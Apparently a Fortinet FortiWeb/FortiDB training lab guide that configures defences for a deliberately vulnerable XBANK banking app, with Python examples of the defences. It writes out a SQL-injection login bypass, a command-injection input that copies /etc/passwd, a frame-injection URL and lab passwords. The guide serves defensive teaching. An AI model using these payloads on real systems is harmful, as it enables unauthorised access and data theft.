1. Enter the virtual IP and URL path to test the HTTP proxy settings

Checking the Configuration
1. After accessing the XBANK application, check your ARP table
   - Windows: run arp -a in a command window
   - Linux/Mac: run arp -an in a terminal
2. Note the MAC addresses for the IP address of your FortiWeb and your virtual IP. Are they the same? Why?

Access using FQDN
1. Add an entry to your hosts file so www.xbank.com resolves to 2.2.2.50 (virtual IP)
   - Windows: %WINDIR%\System32\drivers\etc\hosts
   - Linux/Mac: /etc/hosts
2. Ping www.xbank.com. Does it work?
3. Access www.xbank.com using your browser. Does it work? Why?
4. Add a new entry in your protected server to accept requests to www.xbank.com

Final Results

FortiDB Installation
1. Log in to the virtual machine with an administrator account
2. Execute the FortiDB installer and follow the on-screen instructions
3. Select the installation path or leave the default: C:\FortiDB
4. Select the FortiDB internal repository. Use Derby in this case
5. Leave the communication ports at their defaults
6. Verify the installation by logging in to FortiDB: URL http://2.2.2.20:9100/, UID admin, PWD fortidb1!$

FortiDB Initial Setup (lab login: admin / fortidb1!$)

Monitoring xbankapp_db
1. Navigate to Targets
2. Click Add to specify a new DB Target

Monitoring xbankapp_db (2)
1. Fill in the required information according to the values in the figure
2. Complete the credentials (sa/fortidb1!$)
3. Save
4. Test Connection
5. Validate the test result

Monitoring xbankapp_db (3)
1. Navigate to Monitoring Management
2. Click on the database target

Monitoring xbankapp_db (4)
1. Select the collection method
2. Specify the trace folder location: C:\Program Files\Microsoft SQL Server\MSSQL10.XTREME_DB\MSSQL\Log
3. Test
4. Validate the test result
5. Save

Monitoring xbankapp_db (5)
1. Go to Alert Policy Groups (double-click)
2. Select Monitoring Policy Groups
3. Save

Monitoring xbankapp_db (6)
1. Go to the Alert Policies tab (double-click)
2. Click the check box to enable all policies
3. Click Enable to save

Monitoring xbankapp_db (7)
1. Navigate to the General tab
2. Select "Start monitoring when FortiDB starts" and click the Start Monitoring button
3. Save

Monitoring check
1. Navigate back to Monitoring Management
2. You should end up with a green monitoring status indicator

Introduction to FortiWeb

What is Application Security?

Application life-cycle focus (mitigating control): design, development, deployment, upgrade, maintenance. Ideal, but too late once the application exists: difficult, lengthy, expensive. What about legacy apps, proprietary software, off-the-shelf products and cloud offerings? Who has responsibility?

Application controls focus (compensating control): mitigation of threats (technical/functional) and a web application security policy.

Application Security Needs a New Approach

- Network firewalls detect network attacks: they inspect IP addresses and ports (OSI layers 3-4)
- IPS / deep packet inspection firewalls detect known signatures only:
  - Signature evasion is possible
  - No protection of SSL traffic
  - No real HTTP understanding (headers, parameters, etc.)
  - No application awareness
  - No user awareness
  - High rate of false positives
- FortiWeb web application firewall works at the application layer (OSI layer 7)

Only web application firewalls can detect and block application attacks.

Introducing FortiWeb Web Application Firewall

- Web Application Firewall (WAF): secures web applications to help customers meet compliance requirements
- Web Vulnerability Scanner: scans, analyzes and detects web application vulnerabilities
- Application Delivery: assures availability and accelerates performance of critical web applications

FortiGuard Subscription Services

Real-time security protection: the FortiWeb Security Service subscription keeps your FortiWeb automatically up to date with hundreds of application signatures and with updates to application signatures, malicious robots, suspicious URL patterns and web vulnerability scanner patterns.

Global distributed network: 100+ threat research professionals, eight global locations, automated updates to Fortinet customers. The FortiWeb Antivirus Service subscription provides automated content updates for file upload scanning. Robust 24x7x365 real-time global intelligence.

FortiWeb Flexible Deployment Options

Layer 2 transparent inspection and true transparent proxy:
- Easy deployment: no need to re-architect the network, full transparency
- Fail-open interface
- Supports content modification for both requests and replies from the server
- Advanced URL rewriting capabilities
- HTTPS offloading
- Enhanced load balancing schemes
- Zero network latency
- Blocking capabilities using TCP resets
- Ideal for initial product evaluations and non-intrusive network deployment

Other modes: reverse proxy in front of the web application servers; non-inline deployment on a SPAN port.

High Availability
- Active/passive failover
- Full configuration synchronization
- Seamless failover, no downtime

Configuration Sync
- Sync FortiWeb devices across networks
- Allows managing policies across multiple devices from a central location
- Seamless integration into already existing HA/LB environments (server farm, disaster recovery site)

FortiWeb Product Family

Model                    Target deployments                   Performance                                        Hardware notes
FortiWeb-400C            Mid-enterprise                       100 Mbps HTTP throughput, 10,000 transactions/s   -
FortiWeb-1000C           Large enterprise                     500 Mbps HTTP throughput, 27,000 transactions/s   ASIC-based acceleration (FortiModule-CP7)
FortiWeb-3000C/3000CFsx  Large enterprise / service provider  1 Gbps HTTP throughput, 40,000 transactions/s     ASIC-based acceleration (FortiModule-CP7); hot-swap redundant AC power; 2 x 1 TB storage; 6 x 10/100/1000 copper (+ 2 x Gbps SFP on the 3000CFsx)
FortiWeb-4000C           Large enterprise / service provider  2 Gbps HTTP throughput, 70,000 transactions/s     ASIC-based acceleration (FortiModule-CP7); hardware-based DLP acceleration; hot-swap redundant AC power; 2 x 1 TB storage; 6 x 10/100/1000 copper, 2 x Gbps SFP

FortiWeb-VM
Deploy FortiWeb in a virtualized environment (DMZ, public zone, servers, virtual desktops, virtualized data center):
- Mitigates blind spots
- Protects web applications regardless of connection origin
- Provides visibility into internal connections as well
- Same functionality as the appliance

Requirement                Minimum needed for FortiWeb-VM
Licenses                   2-vCPU, 4-vCPU, 8-vCPU
Hypervisor                 VMware ESXi/ESX 3.5/4.0/4.1/5.0
Memory                     Min. 1024 MB
CPU                        Min. 2 virtual CPUs
10/100/1000 interfaces     Min. 2, max. 4 virtual NICs
Storage capacity           Min. 40 GB
Real Time Dashboard

FortiWeb provides a real-time dashboard:
- Traffic monitor per application
- Attack event history per application
- Latest alerts
- Appliance state

Data Analytics: Geo IP Analysis & Security
- Analyzes web app usage based on geographic location and server access
- Dissects traffic based on hit, data and attack type
- Easily block access from a country using right-click
- Map view or list view
- Provides a graphical interface that helps organizations understand application trends from both a user and a server perspective

FortiAnalyzer Integration
Centralized logging, reporting and analysis for multiple FortiWeb devices (starting from FortiAnalyzer MR3).

Acceleration
Integrated ASIC-based hardware SSL offloading: offloads CPU-intensive SSL computation from the server to FortiWeb.
- Hardware-based key exchange and bulk encryption
- Purpose-built SSL processing
- Full certificate management
- Advanced certificate verification and revocation capabilities

TCP Connection Multiplexing

Data Compression
- Compresses poorly optimised content to minimise the impact on network resources and reduce application delivery latency
- Allows efficient bandwidth utilization and better response time for users by compressing data retrieved from servers
- Compresses files using gzip
- Compression rate depends on data type and character redundancy

Load Balancing
- Intelligent, application-aware layer 7 load balancing
- Support for HTTP/HTTPS only
- Variety of load balancing algorithms: round robin, weighted round robin, least connection, HTTP session-based round robin
- Connection persistence with a persistence timeout value
- Flexible health checks: physical server monitoring via HTTPS, HTTP, TCP, ping; content-based health checks with regex support
- WSDL or content routing statements

Web Services Balancing and Advanced Rewriting Capabilities

- Content routing: route traffic based on IP, Host or URL
- Rewriting and redirection capabilities for Host, URL and Referer
- Rewrite reply content: absolute links, any required content, multiple content types supported

Web Application Scanner


Easily scan your applications for web vulnerabilities
Common vulnerabilities SQL Injection Cross Site Scripting Source code disclosure OS Commanding

Enhanced/Basic Mode Authentication options Granular crawling capabilities Schedule and on demand scanning

FortiWeb

Web Application Scanner


Vulnerability Reports

Scan summary
Vulnerability by severity
Vulnerability by category
Application vulnerabilities
Common vulnerabilities
Crawling information
URLs accepting input
External links

Server Information

Email reports automatically
Updates via FortiGuard
Complements the WAF for PCI DSS 6.6

FortiWeb Auto Learn


Understands Application Structure
Models elements from actual traffic

Builds baseline based on URLs, parameters, HTTP methods

Automatically Understands Real behavior


Can form fields/parameters be modified by users?
What are the length (min, max, average) and type of each form field?
What characters are acceptable?
Is a form field required or optional?

Provides recommendations and graphs

What about those web app dedicated DDoS attacks?


Application-based DDoS is on the increase, accounting for a quarter of all DDoS attacks
Stays under the radar of bandwidth-based thresholds
Targets specific web app/protocol flaws rather than bandwidth consumption:
CPU-intensive SQL queries to the backend DB

Writing to hard disks


Server specific Slowloris - Sends legitimate, but partial, never ending requests

Slow-rate and legitimate-looking request attacks
Uses tools that can be easily downloaded from the internet, such as HOIC and LOIC
Uses botnets and automated tools to reach mass
Sometimes camouflages real data breach attempts (SQL injection primarily)
Zombie botnet: many become one

FortiWeb DoS/DDoS Protection Application and Network Based


Analyzes requests originating from different users based on characteristics such as IP address and cookie
A sophisticated mechanism determines whether these are real users or automated attacks (HOIC, LOIC tools)
Application layer: 4 different policies
HTTP Access Limit - limits the number of HTTP requests per second from a given source IP
Malicious IPs - limits the number of TCP connections with the same session cookie
HTTP Flood Prevention - limits the number of HTTP requests per second with the same session cookie
Real Browser Enforcement - sets the number of HTTP requests per TCP connection, per second, to a specific URL before FortiWeb sends a script to the client to validate whether it is a real browser or an automated tool

Network layer: 2 different policies
TCP Flood Prevention - limits the number of TCP connections from the same source IP address
SYN Cookie - protects against SYN flood attacks

Antivirus File Scanning and File Upload Restriction


Scans file uploads using Fortinet's antivirus engine
Regular and extended virus databases
Updates via FortiGuard with the Antivirus service
Restricts file type uploads

Data Leak Prevention

FortiWeb monitors all outgoing traffic and protects against:


Information Disclosure
Credit Card theft/misuse

Web Site Anti-Defacement

WAF

Monitors application files at specified time intervals
Upon detecting a file change, FortiWeb can alert and/or automatically restore the original file

FortiWeb provides protection at all layers


Advanced Protection Custom Security Policies
Custom policies to match on multiple elements URL, Source IP, Header type and value, Thresholds

Antivirus file upload scanning and Data Leak Prevention


Scans uploaded files for viruses and malware (FortiGuard updates)
Detects information disclosure, credit card and PII leakage

Application and Network Denial of Service Protection (DoS/DDos protection)


Detects and aggregates DoS attacks from multiple vectors

Auto Learn and Validation Rules


Deviations from normal user behavior, automated and custom rules

Application Attack Signatures


Detects known application attacks FortiGuard updates

Protocol Validation
Validates HTTP RFC compliance

Event/Attack/Traffic Alerts
Attack alerts: full HTTP request
Traffic alerts: any access to web applications
Event alerts: any action on the FortiWeb device

Reports - Attacks

Out-of-the-box rich, graphical reports
Custom reports
Scheduled daily, weekly, monthly or on demand
PDF, HTML, Word, TXT, MHT formats

Reports Traffic and Events

Report on any access to the application


Application hits
Service type usage (HTTP/HTTPS)
Top sources

Report on any access or change to the FortiWeb device

FortiWeb Value Add


Dramatically reduce the risk of corporate data loss.
Data Leak Prevention

Application Security
HTTP compliance, application signatures, Auto Learn

Accurate protection with multiple layers of defense
Integrated web vulnerability scanner
Protects against the OWASP Top 10

Application Delivery
Authentication, load balancing and acceleration, compression

Automated management using Auto Learn baselining
Easily deploys in any environment
Multiple deployment options

FortiClient Desktop

Accelerates applications
Application-aware load balancing, compression, ASIC-based SSL acceleration

Vulnerability Assessment

Helps achieve PCI compliance

Hands On How to PoC FortiWeb

Web Protection Profiles Web Protection Profiles

Define what to inspect and how to do it.


Are made of different rules, constraints and settings
Are similar to Protection Profiles in the FortiGate configuration

Creating a new Web Protection Profile

1. Select: Web Protection Profiles > Inline Protection Profile
2. Click Create New

Creating a new Web Protection Profile (2)


1. Name the Web Protection Profile: xbank_web_protection
2. Leave the other fields at their defaults
3. Click OK to save
4. Edit the xbank_web_policy and assign the newly created profile
5. Test accessing the XBANK application

FortiWeb URL Rewriting

FortiWeb URL Rewriting Discussion

URL Rewriting
Without URL rewriting, end users accessing the XBANK application must specify /xbank/ in the URL path because of the server's directory structure. The URL Rewriting feature removes this requirement. Added benefit: it transparently hides the internal directory structure from end users.

URL entered by end user(s) changes From: To:

URL Rewriting > Creating Rewriting Rules

1. Create a new URL Rewriting Rule
2. Click Create New

URL Rewriting > Creating Rewriting Rules (2)

1. Unique rule name
2. What to rewrite
3. Where to rewrite
4. Click OK to save
5. Click Create New to define the RegEx

URL Rewriting > Define Regular Expression Match

1. Select which object to match 2. Define the Pattern Match

3. Select condition of the match

A Note on Regular Expressions
Matching URL paths against a regex provides a concise and flexible means of matching strings of text.

Metacharacter - Description
. - Matches any single character
[] - Matches a single character contained within the brackets
^ - Matches the starting position within the string
$ - Matches the ending position within the string
* - Matches the preceding element zero or more times
? - Matches the preceding element zero or one time
| - Choice operator: matches either the expression before or the expression after the operator
() - Grouping/memory: the text matched between parentheses is kept in a numbered position for later back-reference

URL Rewriting > Creating Rewriting Rules (3)

Specify the new URL path to be used to connect to the defined physical server.
NOTE: $0 = the first RegEx group matched (everything inside the first set of parentheses). FortiWeb numbers back-references from $0, not from $1 as most regex engines do.

URL Rewriting > Create a new Rewrite Policy

1. Create a new URL Rewriting Policy
2. Click Create New

URL Rewriting > Create a new Rewrite Policy (2)

3. Unique policy name
4. Click OK to save
5. Click Create New to select and prioritize the rewrite rule(s)

URL Rewriting > Set Rewrite Rule Priority

1. Set the rule priority
2. Select the rewrite rule
3. Click OK to save

NOTES:
Priorities determine the execution order of the rewriting rules
Lower priority values are executed before higher priority values (the lowest value runs first)

URL Rewriting > Set Rewrite Rule Priority

Final Results

URL Rewriting > Associate Rewrite Policy to Protection Profile

1. Navigate to Web Protection Profile
2. Edit Protection Profile
3. Select the rewrite policy and click OK to save

URL Rewriting > Associate Protection Profile to Server Policy

1. Navigate to Server Policy
2. Edit Server Policy
3. Select the Web Protection Profile

URL Rewriting Test Configuration


After creating the URL Rewriting Policy, assigning it to the Web Protection Profile xbank_web_protection and applying the Web Protection Profile to the Server Policy xbank_web_policy, test the rewrite by entering www.xbank.com into your browser
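The rewriting just configured, as an added example rather than FortiWeb's own code: request paths, absolute links in the reply body and Location headers are rewritten with FortiWeb-style $0 back-references and priority ordering. The regexes, the /xbank/ prefix handling and the hostname are assumptions made for this lab.

```python
import re

# Added example, not FortiWeb code: a small model of the lab's URL rewriting.
# A rule is (priority, object, regex, replacement). Replacements use
# FortiWeb-style back-references, where $0 is the FIRST capture group
# (most regex engines start at $1). Lower priority values run first and the
# first matching rule wins. All rule values are assumptions for the XBANK lab.
REQUEST_RULES = [
    # the client asks for /login.html; the server really hosts /xbank/login.html
    (10, "url", r"^/(?!xbank/)(.*)$", "/xbank/$0"),
]
RESPONSE_RULES = [
    # strip the internal prefix from absolute links in the reply body ...
    (10, "body", r'(href|src|action)="/xbank/', '$0="/'),
    # ... and from redirects the backend issues
    (20, "location", r"^(https?://[^/]+)/xbank/(.*)$", "$0/$1"),
]


def to_python_template(template):
    """Translate FortiWeb $n (first group is $0) into Python's \\g<n+1>."""
    return re.sub(r"\$(\d+)", lambda m: f"\\g<{int(m.group(1)) + 1}>", template)


def apply_rules(rules, obj, value, count):
    """Run the rules for one object in priority order; count=0 rewrites every hit."""
    for _prio, target, pattern, template in sorted(rules, key=lambda r: r[0]):
        if target != obj:
            continue
        rx = re.compile(pattern)
        if rx.search(value):
            return rx.sub(to_python_template(template), value, count=count)
    return value


def rewrite_request_path(path):
    """Path as typed by the user -> path forwarded to the physical server."""
    return apply_rules(REQUEST_RULES, "url", path, count=1)


def rewrite_response_body(html):
    """Hide the internal directory in every absolute link of the reply."""
    return apply_rules(RESPONSE_RULES, "body", html, count=0)


def rewrite_location_header(location):
    """Same for a Location: header, so a redirect does not leak /xbank/."""
    return apply_rules(RESPONSE_RULES, "location", location, count=1)


if __name__ == "__main__":
    print(rewrite_request_path("/login.html"))        # /xbank/login.html
    print(rewrite_request_path("/xbank/login.html"))  # unchanged: already the internal path
    print(rewrite_response_body('<a href="/xbank/index.php?p=login.html">'))
    print(rewrite_location_header("http://www.xbank.com/xbank/index.php"))
```

Rewriting only the request path is not enough to hide the directory: links and redirects the backend emits still contain /xbank/, which is why the reply body and Location header are rewritten too. The negative lookahead keeps a request that already carries the internal prefix from being prefixed twice.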

Preventing Information Disclosure

Preventing Information Disclosure Discussion and Lab

Information Disclosure
1. Usually one of the first steps an attacker takes against a system is gathering information about it: operating system, versions, application types, etc.
2. This gathering process is known as fingerprinting
3. The Server Protection rule Information Disclosure helps prevent the disclosure of this type of information

Prevent Information Disclosure
1. Point your browser to http://www.xbank.com/xxx.html
2. What did you get as a response? Any problem with it?
3. Applications sometimes give away too much information when showing an error

Prevent Information Disclosure - Configuration

1. Navigate to Server Protection
2. Create a new policy

Prevent Information Disclosure Configuration (2)

1. Name the Server Protection Policy: Server_Protection-xbank
2. Enable only the Information Disclosure rule
3. Select the action Alert & Erase
4. Click OK to save

Prevent Information Disclosure Configuration (3)


Edit xbank_web_protection and assign the newly created rule
1. Select the new policy

Test by accessing http://www.xbank.com/xxx.html

Prevent Information Disclosure Check Attack Log
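What the Information Disclosure rule with action Alert & Erase has to do to a reply, as an added example and not FortiWeb code. The sample reply is constructed for the lab's http://www.xbank.com/xxx.html request; the banner, header values and error text are made up, not captured from the lab server.

```python
import re

# Added example, not FortiWeb code. Constructed 404 reply: the kind of banner
# and error text an unprotected server returns for /xxx.html.
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Server": "Apache/2.2.14 (Ubuntu) PHP/5.3.2",
    "X-Powered-By": "PHP/5.3.2",
}
SAMPLE_BODY = (
    "<h1>Not Found</h1>\n"
    "<p>The requested URL /xxx.html was not found on this server.</p>\n"
    "<address>Apache/2.2.14 (Ubuntu) Server at www.xbank.com Port 80</address>\n"
    "Warning: mssql_query(): query failed in /var/www/xbank/verify_admin.php on line 12\n"
)

# Headers whose only job is to announce software versions: dropped entirely.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version")

# Body fragments that hand an attacker versions, paths or internals.
BODY_PATTERNS = {
    "server-banner": re.compile(r"<address>.*?</address>", re.S),
    "software-version": re.compile(r"\b(Apache|nginx|Microsoft-IIS|PHP|OpenSSL)/\d[\w.]*"),
    "php-error": re.compile(r"(Warning|Fatal error|Notice|Parse error): .*? in /\S+ on line \d+"),
}
ERASED = "[erased]"


def erase_disclosure(headers, body):
    """Return (clean_headers, clean_body, alerts); alerts records what was erased."""
    alerts = []
    clean_headers = {}
    for name, value in headers.items():
        if name.lower() in FINGERPRINT_HEADERS:
            alerts.append(("header:" + name, value))
            continue
        clean_headers[name] = value
    clean_body = body
    for label, rx in BODY_PATTERNS.items():
        for match in rx.finditer(clean_body):
            alerts.append((label, match.group(0)))
        clean_body = rx.sub(ERASED, clean_body)
    return clean_headers, clean_body, alerts


def reveals_versions(text):
    """Does any product/version string survive in the text?"""
    return bool(BODY_PATTERNS["software-version"].search(text))


if __name__ == "__main__":
    headers, body, alerts = erase_disclosure(SAMPLE_HEADERS, SAMPLE_BODY)
    for label, fragment in alerts:
        print("ALERT", label, "->", fragment)
    print(headers)
    print(body)
```

Erasing at the WAF is a safety net, not the fix: the origin should stop emitting the data in the first place (for Apache and PHP that means ServerTokens Prod and display_errors = Off). Keep the alerts, since each one points at a server that still leaks.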

Cross Site Scripting (XSS)

Preventing Cross Site Scripting (XSS) Discussion and Lab

Cross Site Scripting (XSS)
This is a type of attack in which malicious scripts are injected into trusted sites
Most of the time a site is vulnerable to this type of attack because it does not do appropriate parameter validation
Can be used to steal credentials, user information and cookies
It exploits the fact that the user trusts the site

Cross Site Scripting (XSS) An example (index.php): determine what parameter p is used for

Cross Site Scripting (XSS) An example (index.php)


index.php is a frameset that contains three frames:
Top: topFrame.html
Bottom: bottomFrame.html
Main: gets its content from the value of the p parameter. By default, parameter p is fed content from login.html

Cross Site Scripting (XSS) An example (index.php)


Look at what happens if you change the value of parameter p to another value.

This is just a simple example. You do not need to guess what happens when a malicious site is used instead of www.google.com. Strictly speaking, loading an attacker-supplied URL into the main frame is frame injection rather than script injection; the lab treats it under XSS because the defence is the same: validate the parameter against what the application actually expects.

Prevent XSS Parameter Validation > Create Rule

1. Navigate to Parameter Validation Rule
2. Click Create New

Prevent XSS Parameter Validation > Create Rule (2)


1. Name the rule: index.php
2. Select Host Status
3. Select Host Name
4. Define the Request URL
5. Select the action: Alert & Deny
6. Select the severity: High
7. Click OK to save
8. Click Create New to define the rule match criteria

Prevent XSS Parameter Validation > Create Rule (3)

Rule match: parameter p = login.html

1. Parameter Name: p
2. Max Length: leave the default value of 0 (length not enforced)
3. Select Required
4. Select Use Type Check
5. Select Argument Type = Regular Expression
6. Regular Expression = ^login.html$ (an unescaped dot matches any character, so ^login\.html$ is the exact match)
7. Click OK to save

Prevent XSS Parameter Validation > Create Policy

1. Navigate to Parameter Validation Policy
2. Click Create New

Prevent XSS Parameter Validation > Create Policy (2)


1. Name the policy: Parameter_Validation_Policy1
2. Click OK to save
3. Click Create New
4. Select the defined rule(s)
5. Click OK to save
6. Final result

Prevent XSS Parameter Validation > Apply Policy

1. Apply the Parameter Validation Policy Parameter_Validation_Policy1 to the Inline Protection Profile xbank_web_protection 2. Click OK to save

Prevent XSS Parameter Validation > Test & Check Logs

1. Navigate to http://www.xbank.com/index.php?p=http://www.google.com 2. Check to see if your GET request is blocked

Expected Block Page

Prevent XSS Parameter Validation > Check Attack Log


Navigate to Log & Report > Log Access > Attack and search for the XSS Attack you just completed
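The parameter validation rule from this lab as a check you can run over a raw request line, added here as an example and not FortiWeb code. The rule values mirror the lab (URL /index.php, parameter p, required, max length 0 meaning not enforced, regular-expression type check); the only deliberate difference is the escaped dot in the regex, and dot_matters() shows why it is needed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not FortiWeb code: the lab's parameter validation rule as a
# check over a raw request line. Rule values mirror the lab; max_length 0 is
# treated as "not enforced", like the lab's default.
RULES = {
    "/index.php": {
        "p": {"required": True, "max_length": 0, "regex": re.compile(r"^login\.html$")},
    },
}


def validate_request(request_line):
    """Return (allowed, reason) for a line such as 'GET /index.php?p=x HTTP/1.1'."""
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    rules = RULES.get(parts.path)
    if rules is None:
        return True, "no rule for " + parts.path
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, rule in rules.items():
        values = params.get(name, [])
        if rule["required"] and not values:
            return False, f"missing required parameter {name}"
        # every occurrence is checked, so p=login.html&p=evil cannot slip through
        for value in values:
            if rule["max_length"] and len(value) > rule["max_length"]:
                return False, f"{name} exceeds {rule['max_length']} characters"
            if not rule["regex"].match(value):
                return False, f"{name}={value!r} fails the type check"
    return True, "ok"


def dot_matters():
    """Why the dot should be escaped: the slide's regex also accepts loginXhtml."""
    loose, strict = re.compile(r"^login.html$"), re.compile(r"^login\.html$")
    return bool(loose.match("loginXhtml")), bool(strict.match("loginXhtml"))


if __name__ == "__main__":
    for line in ("GET /index.php?p=login.html HTTP/1.1",
                 "GET /index.php?p=http://www.google.com HTTP/1.1",
                 "GET /index.php HTTP/1.1"):
        print(line, "->", validate_request(line))
    print(dot_matters())   # (True, False)
```

An allow-list on p is the right shape for this bug: the application only ever needs one value, so anything else, including a second p parameter, is denied rather than inspected for known-bad strings.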

Prevent SQL Injection

Prevent SQL Injection Discussion

SQL Injection An overview of SQL


SQL (Structured Query Language): language for managing data in a DBMS (Database Management System)
Commands are grouped in four sets:
1. Data Manipulation Language (DML): SELECT, UPDATE, INSERT, DELETE
2. Data Definition Language (DDL): CREATE, ALTER, DROP
3. Data Control Language (DCL): GRANT, REVOKE
4. Transaction Control Language (TCL): COMMIT, ROLLBACK

A SQL injection attack modifies SQL statements by inserting specially crafted strings into application fields, URLs, hidden fields, etc.

SQL Injection An overview of SQL - DML


Querying the database (basic):
SELECT Field1, Field2, ... FROM Table1, Table2, ... WHERE Condition1 [and|or] Condition2
SELECT customer_fname, customer_lname FROM xbank_customer WHERE customer_id = 1
Table XBANK_CUSTOMER: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since

SQL Injection An overview of SQL DML (2)


Inserting a record in a database (basic):
INSERT INTO Table1 ( Field1, Field2, ... ) VALUES ( Value1, Value2, ... )
INSERT INTO xbank_customer ( customer_login, customer_password, customer_fname, customer_lname) VALUES ( 'mylogin', 'abc1234', 'John', 'Anderson')

SQL Injection An overview of SQL DML (3)


Updating a record in a database (basic):
UPDATE Table1 SET Field1 = Value1, Field2 = Value2, ... WHERE Condition1 [and|or] Condition2
UPDATE xbank_customer SET customer_login = 'mylogin', customer_password = 'abc1234', customer_fname = 'John', customer_lname = 'Anderson' WHERE customer_id = 1

SQL Injection An overview of SQL DML (4)


Deleting a record from the database (basic):
DELETE FROM Table1 WHERE Condition1 [and|or] Condition2
DELETE FROM xbank_customer WHERE customer_email LIKE '%@company.com' or customer_login = 'mylogin'

SQL Injection A look into verify_admin.php

SQL Injection A look into verify_admin.php (2)
1. mssql_pconnect( ): connect to the DB server
2. mssql_select_db( ): select the DB to use
3. mssql_query( ): query the database
4. mssql_fetch_array( ): read and fetch the next record into an associative array
5. mssql_num_rows( ): get the number of rows returned by a query
6. mssql_close( ): close the connection to the DB server

SQL Injection - CHALLENGE: Login to the application
Try to log in to the application without a valid user or password. TIP: you'll have to inject some SQL

SQL Injection - CHALLENGE: Login to the application (2)


By injecting some SQL you can change the conditional part of the query so that it is always true
Login: whatever you want
Password: mypassword' or 'a'='a

Take a look at the query executed by the application:

select customer_id from xbank_customer where customer_login = 'whatever you want' and customer_password = 'mypassword' or 'a'='a';

The part after the or is always true: 'a' is always equal to 'a'. Because AND binds tighter than OR, the WHERE clause evaluates as (login AND password) OR true, so every row matches.

Prevent SQL Injection Server Protection


Navigate to Web Protection > Known Attacks > Server Protection

1. Edit Known Attacks > Server_Protection-xbank
2. Enable ALL SQL Injection signatures
3. Select Alert & Deny as the action
4. Click OK to save
5. Attempt a new SQL injection

Prevent SQL Injection Server Protection > Test Policy


1. Navigate to http://www.xbank.com/index.php?p=login.html and attempt a new SQL injection: log in with password = mypassword' or 'a'='a
2. Check whether your login attempt gets blocked

Prevent SQL Injection Server Protection > Review Log


Navigate to Log & Report > Log Access > Attack and search for the SQL Injection Attack you just completed

Prevent SQL Injection Summary


1. Instead of using Server Protection signatures, you could also use parameter validation to prevent SQL injection, as we did in the Cross Site Scripting lab
2. To do this, edit the Server Protection rule and disable the SQL Injection signatures
3. Go to Parameter Validation > Input Rule and create a new one:
Request URL: /verify_admin.php
Verify parameters txtUser and txtPassword. Enforce a maximum of 8 (eight) alphanumeric characters (character class [A-Za-z0-9]; as an anchored regex, ^[A-Za-z0-9]{1,8}$)
4. Assign the new Input Rule to the already applied Parameter Validation Policy
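The login query from the challenge and both defences from this section side by side, as an added example (not the lab's verify_admin.php): the string-built query that the tautology payload defeats, the parameterized query that it does not, the summary's input rule, and a toy signature of the kind the Server Protection rule matches. sqlite3 stands in for the lab's MSSQL backend; the table, the test row and the signature are constructed here.

```python
import re
import sqlite3

# Added example, not the lab's verify_admin.php. sqlite3 stands in for MSSQL;
# table, row and the toy signature are constructed, not FortiGuard content.


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE xbank_customer (customer_id INTEGER, "
               "customer_login TEXT, customer_password TEXT)")
    db.execute("INSERT INTO xbank_customer VALUES (1, 'jdoe', 's3cret')")
    return db


def login_vulnerable(db, user, password):
    """Query built by string interpolation, as the lab describes: the attacker
    controls the WHERE clause. AND binds tighter than OR, so
    (login AND password) OR 'a'='a' is true for every row."""
    sql = ("select customer_id from xbank_customer where customer_login = '%s' "
           "and customer_password = '%s'" % (user, password))
    return db.execute(sql).fetchone()


def login_parameterized(db, user, password):
    """Placeholders: the driver passes the values separately, so quotes stay data."""
    sql = ("select customer_id from xbank_customer where customer_login = ? "
           "and customer_password = ?")
    return db.execute(sql, (user, password)).fetchone()


# The summary's input rule, anchored: at most 8 alphanumeric characters.
PARAM_RE = re.compile(r"^[A-Za-z0-9]{1,8}$")


def waf_input_rule_allows(user, password):
    return bool(PARAM_RE.match(user) and PARAM_RE.match(password))


# Toy signature for the quote/OR tautology; a real signature set is far larger.
SIGNATURE = re.compile(r"'\s*(or|and)\s*'?\w*'?\s*=", re.IGNORECASE)


def signature_hits(value):
    return bool(SIGNATURE.search(value))


if __name__ == "__main__":
    db = make_db()
    payload = "mypassword' or 'a'='a"
    print(login_vulnerable(db, "whatever you want", payload))      # (1,): logged in with no credentials
    print(login_parameterized(db, "whatever you want", payload))   # None
    print(waf_input_rule_allows("jdoe", payload), signature_hits(payload))  # False True
```

The allow-list rule stops this payload because a quote is not alphanumeric, and it does so without knowing any attack pattern; the signature approach must keep up with every encoding and variant. Neither replaces parameterized queries in the application; the WAF is the compensating control PCI DSS 6.6 asks for, not the fix.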

Command Injection

Command/Code Injection Discussion

Command Injection Review
Command injection is a type of attack that abuses a vulnerable application to execute commands on the underlying operating system
It is a specific case of the more general category called code injection

Command Injection A look to verify_admin.php

The exec( ) function executes an operating system command. Here exec( ) generates log entries for successful and failed logins, using the variable $log

Command Injection Executing commands


1. Disable the Parameter Validation rules in xbank_web_protection
2. Since the login field value is used by the exec( ) call without being validated first, it is possible to inject commands there
Login: myuser; cat /etc/passwd > salida.txt ; echo
Password: whatever

3. Take a look at the command executed by the application:


exec("echo 2011-05-21 15:20:10: User myuser; cat /etc/passwd > salida.txt ; echo logged in failed >> log/logins.txt")

4. You just copied the content of /etc/passwd to a file in the site's root directory, salida.txt

Command Injection Executing commands (2)
5. Go to the HTTP server (Linux) and check whether the file /var/www/xbank/salida.txt exists

Command Injection Executing commands (3)
6. Since we disabled the Parameter Validation rules, we can use the browser to inspect the file:
http://www.xbank.com/index.php?p=salida.txt
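The shell line the lab's exec() call assembles, reconstructed as an added example rather than the lab's PHP, together with the two application-side fixes and the WAF-side check the lab switched off. The timestamp and log path are the lab's; the helper names are mine and nothing here is executed.

```python
import re
import shlex

# Added example, not the lab's verify_admin.php: reconstructs the command the
# lab's exec() builds, shows why ';' in the login value becomes extra commands,
# and the fixes. Nothing is executed; only strings are built and split.
LOGIN = "myuser; cat /etc/passwd > salida.txt ; echo "   # the injected login value from the lab


def build_vulnerable_command(login, when="2011-05-21 15:20:10", logfile="log/logins.txt"):
    """The string handed to exec(): the value is interpolated into shell syntax unquoted."""
    return f"echo {when}: User {login} logged in failed >> {logfile}"


def shell_commands(cmdline):
    """Split on ';' the way the shell does (enough to show the injected commands)."""
    return [c.strip() for c in cmdline.split(";") if c.strip()]


def safe_log_line(login, when):
    """Fix 1: write the log entry from the application itself, no shell involved."""
    return f"{when}: User {login} logged in failed"


def quoted_argv(login):
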